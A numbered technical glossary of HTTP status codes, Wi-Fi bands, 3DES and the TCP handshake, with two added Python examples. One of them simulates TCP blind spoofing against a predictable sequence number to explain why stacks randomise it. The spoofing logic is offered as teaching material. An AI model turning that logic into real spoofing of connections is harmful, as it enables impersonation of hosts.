2G - Second Generation

2x - May refer to 2 times.

2.x - May refer to the version number.

2.4 GHz - The 2.4 GHz ISM band used by 802.11b/g/n Wi-Fi. Vendors quote indoor ranges of roughly 400 ft and, for single-stream 802.11n, data rates up to 150 Mbps; it penetrates walls better than 5 GHz, so it suits longer range links. Because the band is unlicensed it is shared with cordless phones, garage door openers, microwave ovens, baby monitors, Bluetooth and wireless speakers, all of which cause interference. Wi-Fi channels 1-13 are defined in the band (channel 14 only in Japan), with 12 and 13 restricted to low power in the US; channels 1, 6 and 11 do not overlap and are the usual choice.

2xx Success - This class of status codes indicates the action requested by the client was received, understood and accepted.

200 OK - Standard response for successful HTTP requests. The actual response will depend on the request method used. In a GET request, the response will contain an entity corresponding to the requested resource. In a POST request, the response will contain an entity describing or containing the result of the action.

201 Created - The request has been fulfilled, resulting in the creation of a new resource.

202 Accepted - The request has been accepted for processing, but the processing has not been completed. The request might or might not be eventually acted upon, and may be disallowed when processing occurs.

203 Non-Authoritative Information (since HTTP/1.1) - The server is a transforming proxy (e.g. a Web accelerator) that received a 200 OK from its origin, but is returning a modified version of the origin's response.

204 No Content - The server successfully processed the request and is not returning any content.

205 Reset Content - The server successfully processed the request, but is not returning any content. Unlike a 204 response, this response requires that the requester reset the document view.

206 Partial Content - The server is delivering only part of the resource (byte serving) due to a range header sent by the client. The range header is used by HTTP clients to enable resuming of interrupted downloads, or split a download into multiple simultaneous streams.

207 Multi-Status - The message body that follows is by default an XML message and can contain a number of separate response codes, depending on how many sub-requests were made.

208 Already Reported - The members of a DAV binding have already been enumerated in a preceding part of the (multistatus) response, and are not being included again.

226 IM Used - The server has fulfilled a request for the resource, and the response is a representation of the result of one or more instance-manipulations applied to the current instance.

2600 - Short for 2600: The Hacker Quarterly, a magazine carrying news and information about hacking and phreaking. The name refers to the 2600 Hz tone that phone phreaks used to seize control of long-distance trunk lines.



3DES - Triple DES: an implementation of the Data Encryption Standard (DES) that applies the DES algorithm three times with two or three independent keys instead of once as in ordinary DES. Triple DES is much stronger than single DES, whose 56-bit key is brute-forceable, but weaker and far slower than the Advanced Encryption Standard (AES). NIST, which calls it TDEA (Triple Data Encryption Algorithm), has deprecated it for new applications and disallows it for encryption after 2023.

3G - Third Generation

3rd Party Cookie - A cookie's domain attribute will match the domain that is shown in the web browser's address bar. This is called a first-party cookie. A third-party cookie, however, belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as banner advertisements. This opens up the potential for tracking the user's browsing history and is often used by advertisers in an effort to serve relevant advertisements to each user.

3-way Handshake - The exchange that opens a TCP connection. Machine A sends a segment with the SYN flag set and its initial sequence number (ISN); B answers with SYN/ACK, acknowledging A's ISN + 1 and supplying its own ISN; A completes the handshake with an ACK of B's ISN + 1, after which both sides are in the ESTABLISHED state. Because the final ACK must carry the right number, a peer that cannot see the SYN/ACK has to guess the ISN, which is why modern stacks randomize it.
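The exchange above, simulated in Python with both peers' segments and the sequence-number checks each side applies, as an added example that is not part of this glossary. No sockets are involved; the Segment and peer classes are constructed for the demonstration, and the final function shows what a blind spoofer, who sends a SYN from a forged address and never sees the SYN/ACK, has to get right.

```python
"""TCP three-way handshake with sequence-number checks (added example):
both peers' segments, plus what a blind spoofer who never sees the SYN/ACK
has to guess. Pure simulation, no sockets; ISNs are random unless pinned."""
import secrets
from dataclasses import dataclass
from typing import FrozenSet, Optional, Tuple

MOD = 2 ** 32  # sequence numbers are 32-bit and wrap


@dataclass(frozen=True)
class Segment:
    flags: FrozenSet[str]
    seq: int
    ack: int = 0


class Client:
    def __init__(self, isn: Optional[int] = None):
        self.isn = secrets.randbelow(MOD) if isn is None else isn
        self.state = "CLOSED"

    def syn(self) -> Segment:
        self.state = "SYN_SENT"
        return Segment(frozenset({"SYN"}), seq=self.isn)

    def ack(self, synack: Segment) -> Segment:
        # Only a reply acknowledging exactly our ISN + 1 belongs to this connection.
        if synack.flags != {"SYN", "ACK"} or synack.ack != (self.isn + 1) % MOD:
            raise ValueError("SYN/ACK does not acknowledge our SYN")
        self.state = "ESTABLISHED"
        return Segment(frozenset({"ACK"}), seq=(self.isn + 1) % MOD,
                       ack=(synack.seq + 1) % MOD)


class Server:
    def __init__(self, isn: Optional[int] = None):
        self.isn = secrets.randbelow(MOD) if isn is None else isn
        self.state = "LISTEN"
        self.peer_isn: Optional[int] = None

    def synack(self, syn: Segment) -> Segment:
        if syn.flags != {"SYN"}:
            raise ValueError("expected a bare SYN")
        self.peer_isn = syn.seq
        self.state = "SYN_RECEIVED"
        return Segment(frozenset({"SYN", "ACK"}), seq=self.isn,
                       ack=(syn.seq + 1) % MOD)

    def complete(self, ack: Segment) -> bool:
        """Accept the third segment only if it acknowledges our ISN + 1."""
        ok = (ack.flags == {"ACK"} and self.peer_isn is not None
              and ack.seq == (self.peer_isn + 1) % MOD
              and ack.ack == (self.isn + 1) % MOD)
        self.state = "ESTABLISHED" if ok else "LISTEN"
        return ok


def handshake(client: Client, server: Server) -> Tuple[str, str]:
    syn = client.syn()             # 1. A -> B: SYN,     seq = ISN_A
    synack = server.synack(syn)    # 2. B -> A: SYN/ACK, seq = ISN_B, ack = ISN_A + 1
    ack = client.ack(synack)       # 3. A -> B: ACK,     seq = ISN_A + 1, ack = ISN_B + 1
    server.complete(ack)
    return client.state, server.state


def blind_spoof(server: Server, guessed_isn: int, spoofed_seq: int = 1000) -> bool:
    """The attacker forges the source address, so the SYN/ACK goes elsewhere
    and the server's ISN must be guessed to forge the ACK. With a predictable
    ISN the guess succeeds and the server believes the forged host connected."""
    server.synack(Segment(frozenset({"SYN"}), seq=spoofed_seq))
    forged_ack = Segment(frozenset({"ACK"}), seq=(spoofed_seq + 1) % MOD,
                         ack=(guessed_isn + 1) % MOD)
    return server.complete(forged_ack)


if __name__ == "__main__":
    print("normal handshake:", handshake(Client(), Server()))
    print("spoof vs predictable ISN:", blind_spoof(Server(isn=424242), 424242))
    victim = Server()
    print("spoof vs random ISN:", blind_spoof(victim, (victim.isn + 1) % MOD))
```

The simulation leaves out what a real stack must also handle: the half-open state created by step 2 holds resources until the ACK arrives, which is what a SYN flood exploits, and the reason SYN cookies encode the server's state into the ISN instead of storing it.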

3x - May refer to 3 times.

3.x - May refer to the version number.

3xx Redirection - This class of status code indicates the client must take additional action to complete the request. Many of these status codes are used in URL redirection. A user agent may carry out the additional action with no user interaction only if the method used in the second request is GET or HEAD. A user agent may automatically redirect a request. A user agent should detect and intervene to prevent cyclical redirects.

300 Multiple Choices - Indicates multiple options for the resource from which the client may choose (via agent-driven content negotiation). For example, this code could be used to present multiple video format options, to list files with different filename extensions, or to suggest word-sense disambiguation.

301 Moved Permanently - This and all future requests should be directed to the given URI.

302 Found (Previously "Moved temporarily") - Tells the client to look at (browse to) another URL. 302 has been superseded by 303 and 307. This is an example of industry practice contradicting the standard. The HTTP/1.0 specification (RFC 1945) required the client to perform a temporary redirect (the original describing phrase was "Moved Temporarily"), but popular browsers implemented 302 with the functionality of a 303 See Other. Therefore, HTTP/1.1 added status codes 303 and 307 to distinguish between the two behaviours. However, some Web applications and frameworks use the 302 status code as if it were the 303.

303 See Other (since HTTP/1.1) - The response to the request can be found under another URI using the GET method. When received in response to a POST (or PUT/DELETE), the client should presume that the server has received the data and should issue a new GET request to the given URI.

304 Not Modified - Indicates that the resource has not been modified since the version specified by the request headers If-Modified-Since or If-None-Match. In such case, there is no need to retransmit the resource since the client still has a previously-downloaded copy.

305 Use Proxy (since HTTP/1.1) - The requested resource is available only through a proxy, the address for which is provided in the response. For security reasons, many HTTP clients (such as Mozilla Firefox and Internet Explorer) do not obey this status code.

306 Switch Proxy - No longer used. Originally meant "Subsequent requests should use the specified proxy."

307 Temporary Redirect (since HTTP/1.1) - In this case, the request should be repeated with another URI; however, future requests should still use the original URI. In contrast to how 302 was historically implemented, the request method is not allowed to be changed when reissuing the original request. For example, a POST request should be repeated using another POST request.

308 Permanent Redirect - The request and all future requests should be repeated using another URI. 307 and 308 parallel the behaviors of 302 and 301, but do not allow the HTTP method to change. So, for example, submitting a form to a permanently redirected resource may continue smoothly.
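The method rules for the 3xx codes above, together with the loop and hop-count checks a user agent is expected to apply, are easy to get wrong in hand-written HTTP clients. The Python below is an added example, not code from this glossary or from any HTTP library: it decides the follow-up request for each redirect status and walks a chain while refusing loops and excessive hops. The origin it talks to is a constructed lookup table standing in for a real server.

```python
"""Redirect-following policy for an HTTP client (added example): which method
the follow-up request uses for each 3xx code, plus the loop and hop-count
checks. The responder table below is constructed, not a real server."""
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import urljoin

REDIRECTS = {301, 302, 303, 307, 308}
METHOD_PRESERVING = {307, 308}


class RedirectError(Exception):
    pass


def next_request(method: str, status: int, location: str,
                 current_url: str) -> Optional[Tuple[str, str]]:
    """(method, absolute URL) for the follow-up request, or None if the
    response is not a redirect. Location may be relative to the current URL."""
    if status not in REDIRECTS:
        return None
    target = urljoin(current_url, location)
    if status in METHOD_PRESERVING:
        return method, target           # 307/308: same method, same body
    if status == 303 and method != "HEAD":
        return "GET", target            # 303: fetch the result with GET
    if method == "POST":
        return "GET", target            # 301/302: browsers turn POST into GET
    return method, target


Responder = Callable[[str, str], Tuple[int, Dict[str, str]]]


def follow(method: str, url: str, respond: Responder,
           max_hops: int = 5) -> Tuple[str, str, int]:
    """Issue requests until a non-redirect arrives. Returns the final
    (method, url, status); raises RedirectError on a loop or too many hops."""
    seen = set()
    while True:
        key = (method, url)
        if key in seen:
            raise RedirectError(f"redirect loop at {method} {url}")
        if len(seen) >= max_hops:
            raise RedirectError(f"more than {max_hops} redirects")
        seen.add(key)
        status, headers = respond(method, url)
        nxt = next_request(method, status, headers.get("Location", ""), url)
        if nxt is None:
            return method, url, status
        method, url = nxt


def outcome(method: str, url: str, respond: Responder) -> tuple:
    """Convenience wrapper that reports policy violations as values."""
    try:
        return ("ok", *follow(method, url, respond))
    except RedirectError as exc:
        return ("error", str(exc))


# Constructed origin: a form POST answered with 303, a legacy 302 after a
# form move, a 307 API move that must stay a POST, and a 302 loop.
TABLE = {
    "https://app.example/submit": (303, {"Location": "/result"}),
    "https://app.example/result": (200, {}),
    "https://app.example/old-form": (302, {"Location": "/new-form"}),
    "https://app.example/new-form": (200, {}),
    "https://app.example/api/v1": (307, {"Location": "https://app.example/api/v2"}),
    "https://app.example/api/v2": (200, {}),
    "https://app.example/a": (302, {"Location": "/b"}),
    "https://app.example/b": (302, {"Location": "/a"}),
}


def constructed_responder(method: str, url: str) -> Tuple[int, Dict[str, str]]:
    return TABLE.get(url, (404, {}))


if __name__ == "__main__":
    for m, u in (("POST", "https://app.example/submit"),
                 ("POST", "https://app.example/api/v1"),
                 ("GET", "https://app.example/a")):
        print(m, u, "->", outcome(m, u, constructed_responder))
```

Keying the loop check on (method, URL) rather than URL alone matters: POST /x followed by GET /x is a legitimate pattern after a 303, not a loop. A production client would additionally drop the Authorization header and cookies when a redirect crosses to a different origin, which the text above does not cover.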



4G - Fourth Generation

4x - May refer to 4 times.

4.x - May refer to the version number.

4xx Client errors - This class of status code is intended for situations in which the error seems to have been caused by the client. Except when responding to a HEAD request, the server should include an entity containing an explanation of the error situation, and whether it is a temporary or permanent condition. These status codes are applicable to any request method. User agents should display any included entity to the user.

400 Bad Request - The server cannot or will not process the request due to an apparent client error (e.g., malformed request syntax, size too large, invalid request message framing, or deceptive request routing).

401 Unauthorized - Similar to 403 Forbidden, but specifically for use when authentication is required and has failed or has not yet been provided. The response must include a WWW-Authenticate header field containing a challenge applicable to the requested resource. See Basic access authentication and Digest access authentication. Despite its name, 401 semantically means "unauthenticated": the user has not presented valid authentication credentials for the target resource.

402 Payment Required - Reserved for future use. The original intention was that this code might be used as part of some form of digital cash or micropayment scheme, as proposed, for example, by GNU Taler, but that has not yet happened, and this code is not usually used. Google Developers API uses this status if a particular developer has exceeded the daily limit on requests. Sipgate uses this code if an account does not have sufficient funds to start a call. Shopify uses this code when the store has not paid their fees and is temporarily disabled. Stripe uses this code for failed payments where parameters were correct, for example blocked fraudulent payments.

403 Forbidden - The request contained valid data and was understood by the server, but the server is refusing action. This may be due to the user not having the necessary permissions for a resource or needing an account of some sort, or attempting a prohibited action (e.g. creating a duplicate record where only one is allowed). This code is also typically used if the request supplied credentials (for example in the Authorization header) but the server did not accept them as sufficient. The request should not be repeated.

404 Not Found - The requested resource could not be found but may be available in the future. Subsequent requests by the client are permissible.

405 Method Not Allowed - A request method is not supported for the requested resource; for example, a GET request on a form that requires data to be presented via POST, or a PUT request on a read-only resource.

406 Not Acceptable - The requested resource is capable of generating only content not acceptable according to the Accept headers sent in the request.

407 Proxy Authentication Required - The client must first authenticate itself with the proxy.

408 Request Timeout - The server timed out waiting for the request. According to HTTP specifications: "The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time."

409 Conflict - Indicates that the request could not be processed because of conflict in the current state of the resource, such as an edit conflict between multiple simultaneous updates.

410 Gone - Indicates that the resource requested is no longer available and will not be available again. This should be used when a resource has been intentionally removed and the resource should be purged. Upon receiving a 410 status code, the client should not request the resource in the future. Clients such as search engines should remove the resource from their indices. Most use cases do not require clients and search engines to purge the resource, and a "404 Not Found" may be used instead.

411 Length Required - The request did not specify the length of its content, which is required by the requested resource.

412 Precondition Failed - The server does not meet one of the preconditions that the requester put on the request header fields.

413 Payload Too Large - The request is larger than the server is willing or able to process. Previously called "Request Entity Too Large".

414 URI Too Long - The URI provided was too long for the server to process. Often the result of too much data being encoded as a query-string of a GET request, in which case it should be converted to a POST request. Called "Request-URI Too Long" previously.

415 Unsupported Media Type - The request entity has a media type which the server or resource does not support. For example, the client uploads an image as image/svg+xml, but the server requires that images use a different format.

416 Range Not Satisfiable - The client has asked for a portion of the file (byte serving), but the server cannot supply that portion. For example, if the client asked for a part of the file that lies beyond the end of the file. Called "Requested Range Not Satisfiable" previously.

417 Expectation Failed - The server cannot meet the requirements of the Expect request-header field.

418 I'm a teapot - This code was defined in 1998 as one of the traditional IETF April Fools' jokes, in RFC 2324, Hyper Text Coffee Pot Control Protocol, and is not expected to be implemented by actual HTTP servers. The RFC specifies this code should be returned by teapots requested to brew coffee. This HTTP status is used as an Easter egg in some websites, including

421 Misdirected Request - The request was directed at a server that is not able to produce a response (for example because of connection reuse).

422 Unprocessable Entity - The request was well-formed but was unable to be followed due to semantic errors.

423 Locked - The resource that is being accessed is locked.

424 Failed Dependency - The request failed because it depended on another request and that request failed (e.g., a PROPPATCH).

425 Too Early - Indicates that the server is unwilling to risk processing a request that might be replayed.

426 Upgrade Required - The client should switch to a different protocol such as TLS/1.0, given in the Upgrade header field.

428 Precondition Required - The origin server requires the request to be conditional. Intended to prevent the 'lost update' problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict.

429 Too Many Requests - The user has sent too many requests in a given amount of time. Intended for use with rate-limiting schemes.

431 Request Header Fields Too Large - The server is unwilling to process the request because either an individual header field, or all the header fields collectively, are too large.

451 Unavailable For Legal Reasons - A server operator has received a legal demand to deny access to a resource or to a set of resources that includes the requested resource.



5G - Fifth Generation

5x - May refer to 5 times.

5.x - May refer to the version number.

5 GHz - The 5 GHz band used by 802.11a/n/ac Wi-Fi. Vendors quote ranges of roughly 800 ft with line of sight and data rates up to about 1 Gbps (802.11ac); it offers more non-overlapping channels and less interference than 2.4 GHz but is attenuated more by walls, so it suits shorter range links without barriers. Channels 36, 40, 44 and 48 form the UNII-1 sub-band and are the most commonly used indoors; several other 5 GHz channels require DFS (dynamic frequency selection) to avoid interfering with radar.

5xx Server errors - The server failed to fulfill a request. Response status codes beginning with the digit "5" indicate cases in which the server is aware that it has encountered an error or is otherwise incapable of performing the request. Except when responding to a HEAD request, the server should include an entity containing an explanation of the error situation, and indicate whether it is a temporary or permanent condition. Likewise, user agents should display any included entity to the user. These response codes are applicable to any request method.

500 Internal Server Error - A generic error message, given when an unexpected condition was encountered and no more specific message is suitable.

501 Not Implemented - The server either does not recognize the request method, or it lacks the ability to fulfil the request. Usually this implies future availability (e.g., a new feature of a web-service API)

502 Bad Gateway - The server was acting as a gateway or proxy and received an invalid response from the upstream server.

503 Service Unavailable - The server cannot handle the request (because it is overloaded or down for maintenance). Generally, this is a temporary state.

504 Gateway Timeout - The server was acting as a gateway or proxy and did not receive a timely response from the upstream server.

505 HTTP Version Not Supported - The server does not support the HTTP protocol version used in the request.

506 Variant Also Negotiates - Transparent content negotiation for the request results in a circular reference.

507 Insufficient Storage - The server is unable to store the representation needed to complete the request.

508 Loop Detected - The server detected an infinite loop while processing the request (sent instead of 208 Already Reported).

510 Not Extended - Further extensions to the request are required for the server to fulfil it.

511 Network Authentication Required - The client needs to authenticate to gain network access. Intended for use by intercepting proxies used to control access to the network (e.g., "captive portals" used to require agreement to Terms of Service before granting full Internet access via a Wi-Fi hotspot).



6b/8b - 6b/8b is a line code that expands 6-bit codes to 8-bit symbols for the purposes of maintaining DC-balance in a communications system.

6 Core - Hexa-core; a processor with six independent processing cores on one chip.

6x - May refer to 6 times.

6.x - May refer to the version number.



7B Series - An analog signal conditioning subsystem optimized for the sensor input and output needs of continuous control applications.

7x - May refer to 7 times.

7.x - May refer to the version number.



8b/10b - 8b/10b is a line code that maps 8-bit words to 10-bit symbols to achieve DC-balance and bounded disparity, and yet provide enough state changes to allow reasonable clock recovery.

8 Core - Octa-core; a processor with eight cores, each capable of running one task independently of the others, so the chip can run eight tasks simultaneously.

8D - 8D stands for the 8 disciplines of problem solving. They represent 8 steps to take to solve difficult, recurring or critical problems (often customer failures or major cost drivers). The structured approach provides transparency, drives a team approach, and increases the chance of solving the problem.

8DPSK - 8 Phase Differential Phase Shift Keying

8x - May refer to 8 times.

8.x - May refer to the version number.

802.11 Wi-Fi - Standards developed by The Institute of Electrical and Electronics Engineers IEEE. Standards increase Wireless Local Area Network (WLAN) speeds, lower energy consumption, and improve reliability while extending wireless transmission ranges.

802.11ah - Sub-1GHz band (around 900MHz; marketed as Wi-Fi HaLow), trading speed for long range and low power consumption, with data transfer up to 347Mbps.

802.11ad - 60GHz band with a very short, line-of-sight range (a few metres) and data transfer up to 6.7Gbps.

802.11ac Wi-Fi 5 - 5GHz band with data transfer up to 3.46Gbps. Wider channels, 256-QAM modulation and multi-user MIMO (MU-MIMO) give higher throughput than 802.11n.

802.11a - 5GHz band with data transfer up to 54Mbps.

802.11b - 2.4GHz band with data transfer up to 11Mbps.

802.11g - 2.4GHz band with data transfer up to 54Mbps.

802.11n Wi-Fi 4 - 5 and 2.4GHz bands with data transfer up to 600Mbps under ideal circumstances. 802.11n devices support Multiple-Input Multiple-Output (MIMO) data transfer using several spatial streams at once.



9C - 9C survey at 15 GHz (9C) is an astronomical catalogue generated from the radio observations of the Ninth Cambridge survey at 15 GHz.

9x - May refer to 9 times.

9.x - May refer to the version number.


ref: Techopedia, Wikipedia.


© 2022